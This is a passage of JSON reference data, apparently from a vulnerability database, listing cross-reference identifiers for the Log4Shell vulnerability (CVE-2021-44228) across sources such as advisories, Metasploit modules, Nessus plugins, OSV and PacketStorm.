"76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA21-356A", "AA22-117A", "AA22-152A", "AA22-174A", "AA22-257A", "AA22-279A", "AA22-320A", "AA23-040A", "ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6411625084720414057", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:866017936175971203", "KITPLOIT:8945091038325456871"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2022-0075"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "MALWAREBYTES:180975C3E3516E431BF7664666327048", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-"]}, {"type": "mmpc", "idList": ["MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:C6213215CC0BE4847F142F730607AFA2"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "nessus", "idList": ["701391.PASL", "AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "ALMA_LINUX_ALSA-2022-1777.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "APPLE_IOS_1531_CHECK.NBIN", "APPLE_IOS_153_CHECK.NBIN", "CENTOS8_RHSA-2022-1777.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5083.NASL", "DEBIAN_DSA-5084.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "GENTOO_GLSA-202208-39.NASL", "GENTOO_GLSA-202209-02.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_HT213054.NASL", "MACOS_HT213055.NASL", "MACOS_HT213092.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "OPENSUSE-2022-0705-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-1777.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "REDHAT-RHSA-2022-1777.NASL", "SOLR_CVE-2021-44228.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "SUSE_SU-2022-0690-1.NASL", "SUSE_SU-2022-0703-1.NASL", "SUSE_SU-2022-0705-1.NASL", "SUSE_SU-2022-0811-1.NASL", "SUSE_SU-2022-1431-1.NASL", "SUSE_SU-2022-1511-1.NASL", "SUSE_SU-2022-1677-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022", "ORACLE:CPUJAN2023", "ORACLE:CPUOCT2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-1777"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:DSA-5060-1", "OSV:DSA-5061-1", "OSV:DSA-5083-1", "OSV:DSA-5084-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167917", "PACKETSTORM:170178"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", 